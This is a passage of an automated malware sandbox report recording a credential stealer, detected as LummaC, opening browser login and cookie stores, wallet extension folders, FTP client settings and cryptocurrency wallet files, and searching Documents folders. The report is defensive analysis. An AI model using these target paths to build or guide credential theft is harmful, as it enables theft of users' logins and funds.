Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000003.2267291789.000000000069B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2267376515.00000000006A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2898013500.0000000001124000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ee8d47a049.exe PID: 7836, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: 0000000F.00000003.3090032690.00000000017EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3341116550.000000000126F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 55662d7496.exe PID: 6856, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 2532, type: MEMORYSTR
